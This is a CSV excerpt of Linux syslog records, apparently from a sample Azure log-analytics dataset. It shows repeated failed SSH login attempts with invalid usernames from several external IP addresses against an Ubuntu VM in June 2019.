+12607,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:43:45,UbuntuDevEnv,2019-06-26 03:43:45,auth,UbuntuDevEnv,info,Received disconnect from 45.122.222.193 port 40560:11: Bye Bye [preauth],117022,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.122.222.1,40560,,
+12608,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:43:45,UbuntuDevEnv,2019-06-26 03:43:45,authpriv,UbuntuDevEnv,notice,PAM 2 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.122.222.193,117022,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.122.222.1,,0,
+12609,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:43:45,UbuntuDevEnv,2019-06-26 03:43:45,auth,UbuntuDevEnv,info,Disconnected from invalid user supervisor 45.122.222.193 port 40560 [preauth],117022,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,supervisor,45.122.222.1,40560,,
+12610,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:44:18,UbuntuDevEnv,2019-06-26 03:44:17,auth,UbuntuDevEnv,info,Invalid user bitrix from 118.24.131.236 port 47826,117172,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bitrix,118.24.131.2,47826,,
+12611,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:44:18,UbuntuDevEnv,2019-06-26 03:44:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,117172,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12612,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:44:18,UbuntuDevEnv,2019-06-26 03:44:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.24.131.236,117172,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.24.131.2,,0,
+12613,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:44:20,UbuntuDevEnv,2019-06-26 03:44:19,auth,UbuntuDevEnv,info,Failed password for invalid user bitrix from 118.24.131.236 port 47826 ssh2,117172,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bitrix,118.24.131.2,47826,,
+12614,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:44:20,UbuntuDevEnv,2019-06-26 03:44:20,auth,UbuntuDevEnv,info,Received disconnect from 118.24.131.236 port 47826:11: Bye Bye [preauth],117172,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.24.131.2,47826,,
+12615,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:44:20,UbuntuDevEnv,2019-06-26 03:44:20,auth,UbuntuDevEnv,info,Disconnected from invalid user bitrix 118.24.131.236 port 47826 [preauth],117172,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bitrix,118.24.131.2,47826,,
+12616,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:45:14,UbuntuDevEnv,2019-06-26 03:45:13,auth,UbuntuDevEnv,info,Invalid user peuser from 43.242.215.70 port 44684,117406,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,peuser,43.242.215.7,44684,,
+12617,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:45:14,UbuntuDevEnv,2019-06-26 03:45:14,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,117406,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12618,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:45:14,UbuntuDevEnv,2019-06-26 03:45:14,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.242.215.70,117406,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.242.215.7,,0,
+12619,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:45:16,UbuntuDevEnv,2019-06-26 03:45:16,auth,UbuntuDevEnv,info,Failed password for invalid user peuser from 43.242.215.70 port 44684 ssh2,117406,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,peuser,43.242.215.7,44684,,
+12620,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:45:16,UbuntuDevEnv,2019-06-26 03:45:16,auth,UbuntuDevEnv,info,Disconnected from invalid user peuser 43.242.215.70 port 44684 [preauth],117406,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,peuser,43.242.215.7,44684,,
+12621,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:45:16,UbuntuDevEnv,2019-06-26 03:45:16,auth,UbuntuDevEnv,info,Received disconnect from 43.242.215.70 port 44684:11: Bye Bye [preauth],117406,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.242.215.7,44684,,
+12622,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:45:30,UbuntuDevEnv,2019-06-26 03:45:30,auth,UbuntuDevEnv,info,Invalid user pmail from 106.13.4.172 port 44904,117513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pmail,106.13.4.1,44904,,
+12623,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:45:30,UbuntuDevEnv,2019-06-26 03:45:30,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,117513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12624,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:45:30,UbuntuDevEnv,2019-06-26 03:45:30,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.4.172,117513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.4.1,,0,
+12625,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:45:32,UbuntuDevEnv,2019-06-26 03:45:32,auth,UbuntuDevEnv,info,Failed password for invalid user pmail from 106.13.4.172 port 44904 ssh2,117513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pmail,106.13.4.1,44904,,
+12626,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:45:33,UbuntuDevEnv,2019-06-26 03:45:32,auth,UbuntuDevEnv,info,Disconnected from invalid user pmail 106.13.4.172 port 44904 [preauth],117513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pmail,106.13.4.1,44904,,
+12627,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:45:33,UbuntuDevEnv,2019-06-26 03:45:32,auth,UbuntuDevEnv,info,Received disconnect from 106.13.4.172 port 44904:11: Bye Bye [preauth],117513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.4.1,44904,,
+12628,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:46:08,UbuntuDevEnv,2019-06-26 03:46:07,auth,UbuntuDevEnv,info,Invalid user httpadmin from 118.24.131.236 port 60538,117649,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,httpadmin,118.24.131.2,60538,,
+12629,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:46:08,UbuntuDevEnv,2019-06-26 03:46:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,117649,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12630,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:46:08,UbuntuDevEnv,2019-06-26 03:46:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.24.131.236,117649,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.24.131.2,,0,
+12631,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:46:09,UbuntuDevEnv,2019-06-26 03:46:09,auth,UbuntuDevEnv,info,Failed password for invalid user httpadmin from 118.24.131.236 port 60538 ssh2,117649,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,httpadmin,118.24.131.2,60538,,
+12632,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:46:10,UbuntuDevEnv,2019-06-26 03:46:09,auth,UbuntuDevEnv,info,Received disconnect from 118.24.131.236 port 60538:11: Bye Bye [preauth],117649,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.24.131.2,60538,,
+12633,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:46:10,UbuntuDevEnv,2019-06-26 03:46:09,auth,UbuntuDevEnv,info,Disconnected from invalid user httpadmin 118.24.131.236 port 60538 [preauth],117649,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,httpadmin,118.24.131.2,60538,,
+12634,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:46:12,UbuntuDevEnv,2019-06-26 03:46:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,117667,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12635,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:46:12,UbuntuDevEnv,2019-06-26 03:46:11,auth,UbuntuDevEnv,info,Invalid user tortue from 106.13.4.172 port 49774,117667,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tortue,106.13.4.1,49774,,
+12636,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:46:12,UbuntuDevEnv,2019-06-26 03:46:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.4.172,117667,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.4.1,,0,
+12637,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:46:14,UbuntuDevEnv,2019-06-26 03:46:14,auth,UbuntuDevEnv,info,Failed password for invalid user tortue from 106.13.4.172 port 49774 ssh2,117667,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tortue,106.13.4.1,49774,,
+12638,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:46:14,UbuntuDevEnv,2019-06-26 03:46:14,auth,UbuntuDevEnv,info,Disconnected from invalid user tortue 106.13.4.172 port 49774 [preauth],117667,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tortue,106.13.4.1,49774,,
+12639,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:46:14,UbuntuDevEnv,2019-06-26 03:46:14,auth,UbuntuDevEnv,info,Received disconnect from 106.13.4.172 port 49774:11: Bye Bye [preauth],117667,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.4.1,49774,,
+12640,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:46:51,UbuntuDevEnv,2019-06-26 03:46:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,117799,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12641,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:46:51,UbuntuDevEnv,2019-06-26 03:46:51,auth,UbuntuDevEnv,info,Invalid user ran from 106.13.4.172 port 54642,117799,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ran,106.13.4.1,54642,,
+12642,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:46:51,UbuntuDevEnv,2019-06-26 03:46:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.4.172,117799,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.4.1,,0,
+12643,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:46:53,UbuntuDevEnv,2019-06-26 03:46:53,auth,UbuntuDevEnv,info,Failed password for invalid user ran from 106.13.4.172 port 54642 ssh2,117799,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ran,106.13.4.1,54642,,
+12644,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:46:54,UbuntuDevEnv,2019-06-26 03:46:53,auth,UbuntuDevEnv,info,Received disconnect from 106.13.4.172 port 54642:11: Bye Bye [preauth],117799,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.4.1,54642,,
+12645,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:46:54,UbuntuDevEnv,2019-06-26 03:46:53,auth,UbuntuDevEnv,info,Disconnected from invalid user ran 106.13.4.172 port 54642 [preauth],117799,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ran,106.13.4.1,54642,,
+12646,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:47:12,UbuntuDevEnv,2019-06-26 03:47:11,auth,UbuntuDevEnv,info,Invalid user teamspeak3 from 43.242.215.70 port 10568,117886,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teamspeak3,43.242.215.7,10568,,
+12647,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:47:12,UbuntuDevEnv,2019-06-26 03:47:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,117886,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12648,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:47:12,UbuntuDevEnv,2019-06-26 03:47:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.242.215.70,117886,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.242.215.7,,0,
+12649,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:47:13,UbuntuDevEnv,2019-06-26 03:47:13,auth,UbuntuDevEnv,info,Failed password for invalid user teamspeak3 from 43.242.215.70 port 10568 ssh2,117886,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teamspeak3,43.242.215.7,10568,,
+12650,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:47:13,UbuntuDevEnv,2019-06-26 03:47:13,auth,UbuntuDevEnv,info,Received disconnect from 43.242.215.70 port 10568:11: Bye Bye [preauth],117886,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.242.215.7,10568,,
+12651,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:47:13,UbuntuDevEnv,2019-06-26 03:47:13,auth,UbuntuDevEnv,info,Disconnected from invalid user teamspeak3 43.242.215.70 port 10568 [preauth],117886,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teamspeak3,43.242.215.7,10568,,
+12652,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:47:31,UbuntuDevEnv,2019-06-26 03:47:30,auth,UbuntuDevEnv,info,Invalid user brook from 106.13.4.172 port 59508,117944,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,brook,106.13.4.1,59508,,
+12653,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:47:31,UbuntuDevEnv,2019-06-26 03:47:30,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,117944,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12654,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:47:31,UbuntuDevEnv,2019-06-26 03:47:30,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.4.172,117944,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.4.1,,0,
+12655,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:47:32,UbuntuDevEnv,2019-06-26 03:47:32,auth,UbuntuDevEnv,info,Failed password for invalid user brook from 106.13.4.172 port 59508 ssh2,117944,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,brook,106.13.4.1,59508,,
+12656,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:47:32,UbuntuDevEnv,2019-06-26 03:47:32,auth,UbuntuDevEnv,info,Disconnected from invalid user brook 106.13.4.172 port 59508 [preauth],117944,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,brook,106.13.4.1,59508,,
+12657,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:47:32,UbuntuDevEnv,2019-06-26 03:47:32,auth,UbuntuDevEnv,info,Received disconnect from 106.13.4.172 port 59508:11: Bye Bye [preauth],117944,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.4.1,59508,,
+12658,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:47:32,UbuntuDevEnv,2019-06-26 03:47:32,auth,UbuntuDevEnv,info,Invalid user zhouh from 118.24.131.236 port 45000,117955,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zhouh,118.24.131.2,45000,,
+12659,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:47:33,UbuntuDevEnv,2019-06-26 03:47:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.24.131.236,117955,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.24.131.2,,0,
+12660,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:47:33,UbuntuDevEnv,2019-06-26 03:47:32,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,117955,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12661,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:47:35,UbuntuDevEnv,2019-06-26 03:47:34,auth,UbuntuDevEnv,info,Failed password for invalid user zhouh from 118.24.131.236 port 45000 ssh2,117955,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zhouh,118.24.131.2,45000,,
+12662,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:47:35,UbuntuDevEnv,2019-06-26 03:47:34,auth,UbuntuDevEnv,info,Disconnected from invalid user zhouh 118.24.131.236 port 45000 [preauth],117955,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zhouh,118.24.131.2,45000,,
+12663,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:47:35,UbuntuDevEnv,2019-06-26 03:47:34,auth,UbuntuDevEnv,info,Received disconnect from 118.24.131.236 port 45000:11: Bye Bye [preauth],117955,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.24.131.2,45000,,
+12664,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:48:07,UbuntuDevEnv,2019-06-26 03:48:07,auth,UbuntuDevEnv,info,Invalid user kenneth from 106.13.4.172 port 36142,118076,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,kenneth,106.13.4.1,36142,,
+12665,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:48:07,UbuntuDevEnv,2019-06-26 03:48:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,118076,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12666,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:48:07,UbuntuDevEnv,2019-06-26 03:48:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.4.172,118076,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.4.1,,0,
